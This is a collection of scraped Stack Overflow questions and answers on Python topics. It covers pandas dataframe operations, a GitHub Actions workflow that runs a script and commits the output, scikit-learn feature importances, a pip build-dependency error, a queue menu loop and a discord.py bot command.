'c']], on='UID', how='left', suffixes=['', '_y'])['c_y'].fillna('None') ) >>> df a b c UID 0 elephant alpha elephant (a, alpha, elephant) 1 zebra alpha zebra (b, alpha, zebra) 2 elephant alpha elephant (a, alpha, elephant) 3 zebra beta zebra (d, beta, zebra) 4 elephant beta elephant (e, beta, elephant) 5 zebra charlie zebra (f, charlie, zebra) 6 elephant charlie elephant (g, charlie, elephant) 7 None alpha elephant (h, alpha, elephant) 8 None beta zebra (i, beta, zebra)
replacing a value from df1['colA'] with df2['ColB'] using a unique identifier?
Hi I am trying to replace values in a df1 column A with values from df2 column B, by matching them with df2 column A. Basically if the string of row x in df1['a'] is equal to a string of row y in df2['a'] I want to replace the value of df1['a'] with df2['b']. I have tried a couple things but for some reason this isn't working properly. I also wants to replace values that aren't in df2['a'] with None. my sample data is: df1 = pd.DataFrame({'a': ['a','b','a','d','e','f','g', 'h', 'i'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie', "alpha", "beta"], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant','elephant', "zebra"]}) df2 = pd.DataFrame({'a': ['a','b','c','d','e','f','g'], 'b': ['alpha', 'alpha', 'alpha', 'beta', 'beta', 'charlie', 'charlie'], 'c': ['elephant', "zebra",'elephant', "zebra",'elephant', "zebra",'elephant']}) df1['UID'] = df1['a']+ df1['b']+df1['c'] df2['UID'] = df2['a']+ df2['b']+df2['c'] df1['a'].loc[df1['UID'].isin(df2['UID'])] = df2['c'] animals = ['elephant','zebra'] df1.loc[~df1['a'].isin(animals), "a"] = "None" This works in my sample data but isn't working in my actual data set which is much larger. Any ideas on how to do something similar to this?
[ "I think the explanation is not quite correct. Based on your code attempt, I suspect that what you mean is:\n\nFor each row i of df1 that matches (for all fields (a, b, c)) a row j of df2, then replace df1.loc[i, 'a'] by df2.loc[j, 'c'].\n\nIf that is the correct interpretation of your question, then:\nFirst, it is safer to use a tuple of the row values as UID for the row, instead of the string concatenation: imagine a row '_', 'foo', 'bar' and another '_', 'fooba', 'r' -- they are most certainly distinct. The second advantage of tuple is that it works with other types, not just strings. Thus:\ndf1['UID'] = df1[['a', 'b', 'c']].apply(tuple, axis=1)\ndf2['UID'] = df2[['a', 'b', 'c']].apply(tuple, axis=1)\n\nThen, the expected result can be obtained by merging on UID:\ndf = df1.assign(\n a=df1.merge(\n df2[['UID', 'c']], on='UID', how='left',\n suffixes=['', '_y'])['c_y'].fillna('None')\n)\n\n>>> df\n a b c UID\n0 elephant alpha elephant (a, alpha, elephant)\n1 zebra alpha zebra (b, alpha, zebra)\n2 elephant alpha elephant (a, alpha, elephant)\n3 zebra beta zebra (d, beta, zebra)\n4 elephant beta elephant (e, beta, elephant)\n5 zebra charlie zebra (f, charlie, zebra)\n6 elephant charlie elephant (g, charlie, elephant)\n7 None alpha elephant (h, alpha, elephant)\n8 None beta zebra (i, beta, zebra)\n\n" ]
[ 1 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575994_dataframe_pandas_python.txt
Q: I have a data frame with Few columns and want sum of rows of a specific column with +1 row Input DF: Column A Column B AA 24 BB 37 CC 59 Desired Output Dataframe: Column A Column B Result AA 24 24 BB 37 61 CC 59 120 What I want is result column should have 24 in first row, 24+37 in 2nd row ,24+37+59 in 3rd row and so on. Kindly help I am a beginner and was trying to solve this problem by using sum A: You can use pandas.Series.cumsum : df["Column C"]= df["Column B"].cumsum() # Output : print(df) ​ Column A Column B Column C 0 AA 24 24 1 BB 37 61 2 CC 59 120
I have a data frame with Few columns and want sum of rows of a specific column with +1 row
Input DF: Column A Column B AA 24 BB 37 CC 59 Desired Output Dataframe: Column A Column B Result AA 24 24 BB 37 61 CC 59 120 What I want is that the Result column should have 24 in the first row, 24+37 in the 2nd row, 24+37+59 in the 3rd row, and so on. Kindly help; I am a beginner and was trying to solve this problem by using sum.
[ "You can use pandas.Series.cumsum :\ndf[\"Column C\"]= df[\"Column B\"].cumsum()\n\n# Output :\nprint(df)\n​\n Column A Column B Column C\n0 AA 24 24\n1 BB 37 61\n2 CC 59 120\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python", "row" ]
stackoverflow_0074576611_dataframe_pandas_python_row.txt
Q: Compare elements in lists on 1 column rows and assign unique values in new column, Pandas I would like to compare elements in lists in 1 column and assign unique values that are on no other row in new column in the same Pandas df: Int.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48]} Out.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48], "unique_values": [[77], [100], [None], [47,48]], } Thanks. A: You can use isin and stack: data['unique_values'] = ([df.loc[~df[col].isin(df.set_index(col).stack()), col].tolist() for col in df.columns]) data: {'object_1': [1, 3, 4, 5, 77], 'object_2': [1, 5, 100, 3, 4], 'object_3': [1, 3, 4, 5, 5], 'object_4': [1, 3, 5, 47, 48], 'unique_values': [[77], [100], [], [47, 48]]} A: Here is a way using drop_duplicates() df.stack().drop_duplicates(keep=False).groupby(level=1).agg(list).to_dict() Output: {'object_1': [77], 'object_2': [100], 'object_4': [47, 48]}
Compare elements in lists on 1 column rows and assign unique values in new column, Pandas
I would like to compare elements in lists in 1 column and assign unique values that are on no other row in new column in the same Pandas df: Int.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48]} Out.: data = {'object_1':[1, 3, 4, 5, 77], 'object_2':[1, 5, 100, 3, 4], "object_3": [1, 3, 4, 5, 5], "object_4": [1, 3, 5, 47, 48], "unique_values": [[77], [100], [None], [47,48]], } Thanks.
[ "You can use isin and stack:\ndata['unique_values'] = ([df.loc[~df[col].isin(df.set_index(col).stack()), col].tolist()\n for col in df.columns])\n\ndata:\n{'object_1': [1, 3, 4, 5, 77],\n 'object_2': [1, 5, 100, 3, 4],\n 'object_3': [1, 3, 4, 5, 5],\n 'object_4': [1, 3, 5, 47, 48],\n 'unique_values': [[77], [100], [], [47, 48]]}\n\n", "Here is a way using drop_duplicates()\ndf.stack().drop_duplicates(keep=False).groupby(level=1).agg(list).to_dict()\n\nOutput:\n{'object_1': [77], 'object_2': [100], 'object_4': [47, 48]}\n\n" ]
[ 1, 0 ]
[]
[]
[ "pandas", "python" ]
stackoverflow_0074576366_pandas_python.txt
Q: How to create a new column with how many times a value in another variable repeats in python I am trying to create a new column in a dataframe in which I can count how many times a value in another variables. I want my outcome to be like the column "count" Product Count Apple 3 orange 2 Apple 3 orange 2 Apple 3 Pear 1 I have tried the following: df['Prodct'].value_counts() Hence, I have the list of the count for each product, but I don't know how to put it in the data frame how I stated before A: Is this what you're trying to achieve? import pandas as pd import numpy as np import random fruits = ['Apple', 'Orange', 'Banana', 'Kiwi', 'Mango'] # bootstrap fruits samples = np.random.choice(fruits, size=100, replace=True) df = pd.DataFrame({'fruit': samples}) print(df.head()) count_dict = df['fruit'].value_counts().to_dict() df['count'] = df['fruit'].map(count_dict) print('-------------') print(df.head()) The code above yields the following output: Before the modification: fruit 0 Kiwi 1 Orange 2 Banana 3 Orange 4 Apple After the modification: fruit count 0 Kiwi 28 1 Orange 20 2 Banana 19 3 Orange 20 4 Apple 18
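The same idea can be written directly against the column names from the question, either by mapping value_counts or with a groupby transform; both are standard pandas, assuming df holds the Product column:

import pandas as pd

df = pd.DataFrame({"Product": ["Apple", "orange", "Apple", "orange", "Apple", "Pear"]})

# Option 1: map each product to its total count
df["Count"] = df["Product"].map(df["Product"].value_counts())

# Option 2: equivalent groupby transform
df["Count"] = df.groupby("Product")["Product"].transform("count")

print(df)
#   Product  Count
# 0   Apple      3
# 1  orange      2
# 2   Apple      3
# 3  orange      2
# 4   Apple      3
# 5    Pear      1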
How to create a new column with how many times a value in another variable repeats in python
I am trying to create a new column in a dataframe in which I count how many times a value in another variable repeats. I want my outcome to look like the column "Count": Product Count Apple 3 orange 2 Apple 3 orange 2 Apple 3 Pear 1 I have tried the following: df['Prodct'].value_counts() With that I have the count for each product, but I don't know how to put it into the data frame as shown above.
[ "Is this what you're trying to achieve?\nimport pandas as pd\nimport numpy as np\nimport random\n\nfruits = ['Apple', 'Orange', 'Banana', 'Kiwi', 'Mango']\n\n# bootstrap fruits\nsamples = np.random.choice(fruits, size=100, replace=True)\n\ndf = pd.DataFrame({'fruit': samples})\n\nprint(df.head())\n\ncount_dict = df['fruit'].value_counts().to_dict()\ndf['count'] = df['fruit'].map(count_dict)\n\nprint('-------------')\n\nprint(df.head())\n\nThe code above yields the following output:\nBefore the modification:\n fruit\n0 Kiwi\n1 Orange\n2 Banana\n3 Orange\n4 Apple\n\nAfter the modification:\n fruit count\n0 Kiwi 28\n1 Orange 20\n2 Banana 19\n3 Orange 20\n4 Apple 18\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074576265_dataframe_pandas_python.txt
Q: Avoid df.iterrow to drop dataframe rows within certain conditions I have a dataframe similar to this: import pandas as pd colA = ['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'c', 'c', 'c', 'c'] colB = [(21,1,2), (0,1,21), (2,1,21), (1,12,5), (21,1,0), (12,5,6), (18,7,14), (7,5,12), (14,7,18), (12,7,11), (11,7,12), (3,5,7)] df = pd.DataFrame(list(zip(colA, colB)), columns = ['colA', 'colB']) display(df) output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (2, 1, 21) 3 a (1, 12, 5) 4 b (21, 1, 0) 5 b (12, 5, 6) 6 b (18, 7, 14) 7 b (7, 5, 12) 8 c (14, 7, 18) 9 c (12, 7, 11) 10 c (11, 7, 12) 11 c (3, 5, 7) I'd need to drop (or filter out) all the rows where, within the same value of colA, a value of colB in a row is equal to the reverse value of colB in another row. In the example provided: within colA='a' row 2 has colB=(2,1,21) which is the reverse of row 0 colB=(21,1,2) and thus should be dropped colA='b' row 4 has colB=(21,1,0) which is the reverse of row 1 colB=(0,1,21) but that's colA='a' so nothing to drop here within colA='c' row 10 has colB=(11,7,12) which is the reverse of row 9 colB=(12,7,11) and thus should be dropped Final results would something like: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7) Observations: Preferable to drop row on a duplicated dataframe and keep the original Very important: my real dataframe has shape (3millions, 11), so I am looking for an efficient way to do this, like .apply, lambda etc..I did this in the past with df.iterrows, it was already not the best way, my bad..now it's completely unfeasible Current df.iterrows solution: unique_df = df.copy() seen_a_b = set() for i, row in df.iterrows(): val_a = row['colA'] val_b = row['colB'] a_b = (val_a, val_b) a_revb = (val_a, val_b[::-1]) if a_b in seen_a_b: unique_df.drop(i, inplace=True) continue seen_a_b.add(a_b) seen_a_b.add(a_revb) A: Try this: df.groupby(['colA',df['colB'].map(lambda x: frozenset((x[0],x[-1])))],as_index=False).first() This solution creates a frozenset, or an immutable set that can be used as a groupby key. This, along with colA is used to get the first value of each group. We are only using the first and last value in colB, as the middle value is the same forward and backwards. Output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7)
Avoid df.iterrow to drop dataframe rows within certain conditions
I have a dataframe similar to this: import pandas as pd colA = ['a', 'a', 'a', 'a', 'b', 'b', 'b', 'b', 'c', 'c', 'c', 'c'] colB = [(21,1,2), (0,1,21), (2,1,21), (1,12,5), (21,1,0), (12,5,6), (18,7,14), (7,5,12), (14,7,18), (12,7,11), (11,7,12), (3,5,7)] df = pd.DataFrame(list(zip(colA, colB)), columns = ['colA', 'colB']) display(df) output: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (2, 1, 21) 3 a (1, 12, 5) 4 b (21, 1, 0) 5 b (12, 5, 6) 6 b (18, 7, 14) 7 b (7, 5, 12) 8 c (14, 7, 18) 9 c (12, 7, 11) 10 c (11, 7, 12) 11 c (3, 5, 7) I'd need to drop (or filter out) all the rows where, within the same value of colA, a value of colB in a row is equal to the reverse value of colB in another row. In the example provided: within colA='a' row 2 has colB=(2,1,21) which is the reverse of row 0 colB=(21,1,2) and thus should be dropped colA='b' row 4 has colB=(21,1,0) which is the reverse of row 1 colB=(0,1,21) but that's colA='a' so nothing to drop here within colA='c' row 10 has colB=(11,7,12) which is the reverse of row 9 colB=(12,7,11) and thus should be dropped Final results would something like: colA colB 0 a (21, 1, 2) 1 a (0, 1, 21) 2 a (1, 12, 5) 3 b (21, 1, 0) 4 b (12, 5, 6) 5 b (18, 7, 14) 6 b (7, 5, 12) 7 c (14, 7, 18) 8 c (12, 7, 11) 9 c (3, 5, 7) Observations: Preferable to drop row on a duplicated dataframe and keep the original Very important: my real dataframe has shape (3millions, 11), so I am looking for an efficient way to do this, like .apply, lambda etc..I did this in the past with df.iterrows, it was already not the best way, my bad..now it's completely unfeasible Current df.iterrows solution: unique_df = df.copy() seen_a_b = set() for i, row in df.iterrows(): val_a = row['colA'] val_b = row['colB'] a_b = (val_a, val_b) a_revb = (val_a, val_b[::-1]) if a_b in seen_a_b: unique_df.drop(i, inplace=True) continue seen_a_b.add(a_b) seen_a_b.add(a_revb)
[ "Try this:\ndf.groupby(['colA',df['colB'].map(lambda x: frozenset((x[0],x[-1])))],as_index=False).first()\n\nThis solution creates a frozenset, or an immutable set that can be used as a groupby key. This, along with colA is used to get the first value of each group. We are only using the first and last value in colB, as the middle value is the same forward and backwards.\nOutput:\n colA colB\n0 a (21, 1, 2)\n1 a (0, 1, 21)\n2 a (1, 12, 5)\n3 b (21, 1, 0)\n4 b (12, 5, 6)\n5 b (18, 7, 14)\n6 b (7, 5, 12)\n7 c (14, 7, 18)\n8 c (12, 7, 11)\n9 c (3, 5, 7)\n\n" ]
[ 0 ]
[]
[]
[ "dataframe", "pandas", "python" ]
stackoverflow_0074575790_dataframe_pandas_python.txt
Q: Github action to execute a Python script that create a file, then commit and push this file My repo contains a main.py that generates a html map and save results in a csv. I want the action to: execute the python script (-> this seems to be ok) that the file generated would then be in the repo, hence having the file generated to be added, commited and pushed to the main branch to be available in the page associated with the repo. name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script uses: actions/checkout@v3 run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push The github-action does not pass when I include the 2nd uses: actions/checkout@v3 and the git commands. Thanks in advance for your help A: If you want to run a script, then you don't need an additional checkout step for that. There is a difference between steps that use workflows and those that execute shell scripts directly. You can read more about it here. In your configuration file, you kind of mix the two in the last step. You don't need an additional checkout step because the repo from the first step is still checked out. So you can just use the following workflow: name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push I tested it with a dummy repo and everything worked.
Github action to execute a Python script that create a file, then commit and push this file
My repo contains a main.py that generates a html map and save results in a csv. I want the action to: execute the python script (-> this seems to be ok) that the file generated would then be in the repo, hence having the file generated to be added, commited and pushed to the main branch to be available in the page associated with the repo. name: refresh map on: schedule: - cron: "30 11 * * *" #runs at 11:30 UTC everyday jobs: getdataandrefreshmap: runs-on: ubuntu-latest steps: - name: checkout repo content uses: actions/checkout@v3 # checkout the repository content to github runner. - name: setup python uses: actions/setup-python@v4 with: python-version: 3.8 #install the python needed - name: Install dependencies run: | if [ -f requirements.txt ]; then pip install -r requirements.txt; fi - name: execute py script uses: actions/checkout@v3 run: | python main.py git config user.name github-actions git config user.email github-actions@github.com git add . git commit -m "crongenerated" git push The github-action does not pass when I include the 2nd uses: actions/checkout@v3 and the git commands. Thanks in advance for your help
[ "If you want to run a script, then you don't need an additional checkout step for that. There is a difference between steps that use workflows and those that execute shell scripts directly. You can read more about it here.\nIn your configuration file, you kind of mix the two in the last step. You don't need an additional checkout step because the repo from the first step is still checked out. So you can just use the following workflow:\nname: refresh map\n\non:\n schedule:\n - cron: \"30 11 * * *\" #runs at 11:30 UTC everyday\n\njobs:\n getdataandrefreshmap:\n runs-on: ubuntu-latest\n steps:\n - name: checkout repo content\n uses: actions/checkout@v3 # checkout the repository content to github runner.\n - name: setup python\n uses: actions/setup-python@v4\n with:\n python-version: 3.8 #install the python needed\n - name: Install dependencies\n run: |\n if [ -f requirements.txt ]; then pip install -r requirements.txt; fi\n - name: execute py script\n run: |\n python main.py\n git config user.name github-actions\n git config user.email github-actions@github.com\n git add .\n git commit -m \"crongenerated\"\n git push\n\n\nI tested it with a dummy repo and everything worked.\n" ]
[ 3 ]
[]
[]
[ "github_actions", "python" ]
stackoverflow_0074575744_github_actions_python.txt
Q: Random Forest Classifier: Set feature importances? On an RFC model, I am trying to figure out how the feature importances change my classification when I am perturbing my data, like features(no perturbation) = features(perturbed data) - features(perturbation), then using the features(no perturbation) on my already fitted model. Do you know if it is possible to manually set or change the feature importances of an RFC model? I tried looking for this but found no results. Thank you. A: The general convention in scikit-learn code is that attributes that are inferred from your data / training end with _. feature_importances_ attributes respects that convention as well. They represent impurity-based importances and they are computed / inferred from your training set statistics. You have the option to act on the weight you give to the different samples through sample_weight argument as well as weighting your classes through class_weight parameter.
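As the answer says, feature_importances_ is inferred at fit time and is read-only; what you can set are class_weight (at construction) and sample_weight (at fit time). A small runnable sketch with stand-in data, just to show where each hook goes:

import numpy as np
from sklearn.ensemble import RandomForestClassifier

X = np.random.rand(200, 5)                 # stand-in features
y = (X[:, 0] > 0.5).astype(int)            # stand-in labels

clf = RandomForestClassifier(
    n_estimators=200,
    class_weight={0: 1.0, 1: 2.0},         # set when the model is constructed
    random_state=0,
)
clf.fit(X, y, sample_weight=np.where(y == 1, 2.0, 1.0))   # one weight per training row

print(clf.feature_importances_)            # computed from training; cannot be assigned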
Random Forest Classifier: Set feature importances?
On an RFC model, I am trying to figure out how the feature importances change my classification when I am perturbing my data, like features(no perturbation) = features(perturbed data) - features(perturbation), then using the features(no perturbation) on my already fitted model. Do you know if it is possible to manually set or change the feature importances of an RFC model? I tried looking for this but found no results. Thank you.
[ "The general convention in scikit-learn code is that attributes that are inferred from your data / training end with _. feature_importances_ attributes respects that convention as well. They represent impurity-based importances and they are computed / inferred from your training set statistics.\nYou have the option to act on the weight you give to the different samples through sample_weight argument as well as weighting your classes through class_weight parameter.\n" ]
[ 0 ]
[]
[]
[ "machine_learning", "python", "random_forest", "scikit_learn" ]
stackoverflow_0074575103_machine_learning_python_random_forest_scikit_learn.txt
Q: ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 I'm trying to install djangular-serve in my project but I'm unsure what version of setuptools_Scm it's asking for. Using cached djangular-serve-2.1.0.tar.gz (34 kB) Installing build dependencies ... error error: subprocess-exited-with-error × pip subprocess to install build dependencies did not run successfully. │ exit code: 1 ╰─> [4 lines of output] Collecting setuptools>=49.6.0 Using cached setuptools-65.6.3-py3-none-any.whl (1.2 MB) ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 (from versions: 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.7.0, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.13.0, 1.13.1, 1.14.0rc1, 1.14.0, 1.15.0rc1, 1.15.0, 1.15.1rc1, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 2.0.0, 2.1.0, 3.0.0, 3.0.1, 3.0.2, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2.0, 3.3.1, 3.3.2, 3.3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.5.0, 4.0.0, 4.1.0, 4.1.1, 4.1.2, 5.0.0, 5.0.1, 5.0.2, 6.0.0, 6.0.1, 6.1.0.dev0, 6.1.0, 6.1.1, 6.2.0, 6.3.0, 6.3.1, 6.3.2, 6.4.0, 6.4.1, 6.4.2, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5) ERROR: No matching distribution found for setuptools_scm<3,>=4.1.2 [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: subprocess-exited-with-error I'm confused, how can the version be greater than 4.1.2 but less than 3? Do I need to fix the setup? How do I download the package and do that if I need to fix it? A: This is a bug in djangular-serve in pyproject.toml. Please report the bug. The fact that nobody reported the bug in two years suggests the package is not very popular among users.
ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2
I'm trying to install djangular-serve in my project but I'm unsure what version of setuptools_Scm it's asking for. Using cached djangular-serve-2.1.0.tar.gz (34 kB) Installing build dependencies ... error error: subprocess-exited-with-error × pip subprocess to install build dependencies did not run successfully. │ exit code: 1 ╰─> [4 lines of output] Collecting setuptools>=49.6.0 Using cached setuptools-65.6.3-py3-none-any.whl (1.2 MB) ERROR: Could not find a version that satisfies the requirement setuptools_scm<3,>=4.1.2 (from versions: 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.4.0, 1.4.1, 1.5.0, 1.5.2, 1.5.3, 1.5.4, 1.5.5, 1.6.0, 1.7.0, 1.8.0, 1.9.0, 1.10.0, 1.10.1, 1.11.0, 1.11.1, 1.13.0, 1.13.1, 1.14.0rc1, 1.14.0, 1.15.0rc1, 1.15.0, 1.15.1rc1, 1.15.4, 1.15.5, 1.15.6, 1.15.7, 1.16.0, 1.16.1, 1.16.2, 1.17.0, 2.0.0, 2.1.0, 3.0.0, 3.0.1, 3.0.2, 3.0.4, 3.0.5, 3.0.6, 3.1.0, 3.2.0, 3.3.1, 3.3.2, 3.3.3, 3.4.0, 3.4.1, 3.4.2, 3.4.3, 3.5.0, 4.0.0, 4.1.0, 4.1.1, 4.1.2, 5.0.0, 5.0.1, 5.0.2, 6.0.0, 6.0.1, 6.1.0.dev0, 6.1.0, 6.1.1, 6.2.0, 6.3.0, 6.3.1, 6.3.2, 6.4.0, 6.4.1, 6.4.2, 7.0.0, 7.0.1, 7.0.2, 7.0.3, 7.0.4, 7.0.5) ERROR: No matching distribution found for setuptools_scm<3,>=4.1.2 [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. error: subprocess-exited-with-error I'm confused, how can the version be greater than 4.1.2 but less than 3? Do I need to fix the setup? How do I download the package and do that if I need to fix it?
[ "This is a bug in djangular-serve in pyproject.toml. Please report the bug. The fact that nobody reported the bug in two years suggests the package is not very popular among users.\n" ]
[ 0 ]
[]
[]
[ "django", "djangular", "pip", "python" ]
stackoverflow_0074576627_django_djangular_pip_python.txt
Q: If loop in queue keeps repeating # creating menu def menu(): print("What do you want to do:") print("1)Push") print("2)Pop") print("3)Display") print("4)Quit") choice = int(input("Make a selection: ")) return choice # creating a queue with a list def create_queue(): # creating a queue queue = [] while menu() > 0 & menu() < 5: if menu() == 1: print("You choose: Push") num_input = int(input("How many items do you want to enter: ")) for i in range(num_input): queue.append(input("Enter items: ")) elif menu() == 2: print("You choose: Pop") # making sure queue is not empty if len(queue) == 0: print("Empty, nothing to get rid of.") return else: print("Popping item out") queue.pop(0) elif menu() == 3: print("You choose: Display") print(queue) elif menu() == 4: print("You chose: Quit") return else: print("Not a choice") return create_queue() This is my code above, every time I run it, it would keep asking what I want to do, this is what I mean when it keeps repeating: What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 You choose: Push How many items do you want to enter: I have tried putting user choice in the loop but it would just get stuck in one choice instead of looping back out. I just want it to ask once and then afterwards, loop back out. Where did I mess up and what can I change to fix this? A: In your code, you are calling the 'menu()' function multiple times. while menu() > 0 & menu() < 5: if menu() == 1: Save it in a variable: choice = None while choice > 0 and choice < 5: choice = menu() if choice == 1: # Etc. Hope this resolves your issue!
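One caveat about the answer's sketch: starting from choice = None makes the first choice > 0 comparison raise a TypeError in Python 3, so the loop needs a real starting value (or the first menu() call has to happen before the check). A corrected sketch along the same lines, calling menu() only once per pass:

def menu():
    print("What do you want to do:\n1)Push\n2)Pop\n3)Display\n4)Quit")
    return int(input("Make a selection: "))

def create_queue():
    queue = []
    choice = menu()                        # first selection, instead of None
    while choice != 4:
        if choice == 1:
            for _ in range(int(input("How many items do you want to enter: "))):
                queue.append(input("Enter items: "))
        elif choice == 2:
            print("Empty, nothing to get rid of." if not queue else f"Popping {queue.pop(0)}")
        elif choice == 3:
            print(queue)
        else:
            print("Not a choice")
        choice = menu()                    # re-prompt; menu() is only called here
    print("You chose: Quit")

create_queue()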
If loop in queue keeps repeating
# creating menu def menu(): print("What do you want to do:") print("1)Push") print("2)Pop") print("3)Display") print("4)Quit") choice = int(input("Make a selection: ")) return choice # creating a queue with a list def create_queue(): # creating a queue queue = [] while menu() > 0 & menu() < 5: if menu() == 1: print("You choose: Push") num_input = int(input("How many items do you want to enter: ")) for i in range(num_input): queue.append(input("Enter items: ")) elif menu() == 2: print("You choose: Pop") # making sure queue is not empty if len(queue) == 0: print("Empty, nothing to get rid of.") return else: print("Popping item out") queue.pop(0) elif menu() == 3: print("You choose: Display") print(queue) elif menu() == 4: print("You chose: Quit") return else: print("Not a choice") return create_queue() This is my code above, every time I run it, it would keep asking what I want to do, this is what I mean when it keeps repeating: What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 What do you want to do: 1)Push 2)Pop 3)Display 4)Quit Make a selection: 1 You choose: Push How many items do you want to enter: I have tried putting user choice in the loop but it would just get stuck in one choice instead of looping back out. I just want it to ask once and then afterwards, loop back out. Where did I mess up and what can I change to fix this?
[ "In your code, you are calling the 'menu()' function multiple times.\nwhile menu() > 0 & menu() < 5:\n if menu() == 1:\n\nSave it in a variable:\nchoice = None\nwhile choice > 0 and choice < 5:\n choice = menu()\n if choice == 1:\n# Etc.\n\nHope this resolves your issue!\n" ]
[ 0 ]
[]
[]
[ "data_structures", "loops", "python", "queue" ]
stackoverflow_0074576720_data_structures_loops_python_queue.txt
Q: Edit Discord message with the before content replaced I'm currently developing a Discord bot with discord.py. I made a command named underscored and the goal is to edit each message the bot sends with just replacing the spaces by underscores. Here's an example: User: /test Bot: This is a test command. User: /underscored User: /test Bot: This_is_a_test_command. So here's the command: @bot.command() async def underscored(ctx): underscored == True And on the other hand, here's the on_message event I made: @bot.event async def on_message(message, before): if underscored == True: await message.edit(content=before.replace(' ', '_')) Now, here's the error I'm getting: Traceback (most recent call last): File "C:\Users\cold\AppData\Local\Programs\Python\Python39\lib\site-packages\discord\client.py", line 343, in _run_event await coro(*args, **kwargs) TypeError: on_message() missing 1 required positional argument: 'before' Can someone help me? I quite don't understand what's going on. A: You get that error because on_message event takes only one argument, which is the message (discord.Message class). You can refere the documentation here You will have to implement it to every command manually, instead of using the on_message event # global variable that can be accessed by every command underscored_s = False @bot.command() async def underscored(ctx): global underscored_s # toggle underscored status, turn on if off, turn off if on if underscored_s is True: underscored_s = False await ctx.send("changed underscored to False") else: underscored_s = True await ctx.send("changed underscored to True") @bot.command() async def on_message(ctx): global underscored_s message = "This is a test command." if underscored_s is True: await ctx.send(message) else: await ctx.send(message.replace(' ', '_')) on_message event is to be used when a new message is sent by a user, to process it by the bot. I dont think that it can be used to edit the message sent by the bot as a reply to the on_message event
Edit Discord message with the before content replaced
I'm currently developing a Discord bot with discord.py. I made a command named underscored and the goal is to edit each message the bot sends with just replacing the spaces by underscores. Here's an example: User: /test Bot: This is a test command. User: /underscored User: /test Bot: This_is_a_test_command. So here's the command: @bot.command() async def underscored(ctx): underscored == True And on the other hand, here's the on_message event I made: @bot.event async def on_message(message, before): if underscored == True: await message.edit(content=before.replace(' ', '_')) Now, here's the error I'm getting: Traceback (most recent call last): File "C:\Users\cold\AppData\Local\Programs\Python\Python39\lib\site-packages\discord\client.py", line 343, in _run_event await coro(*args, **kwargs) TypeError: on_message() missing 1 required positional argument: 'before' Can someone help me? I quite don't understand what's going on.
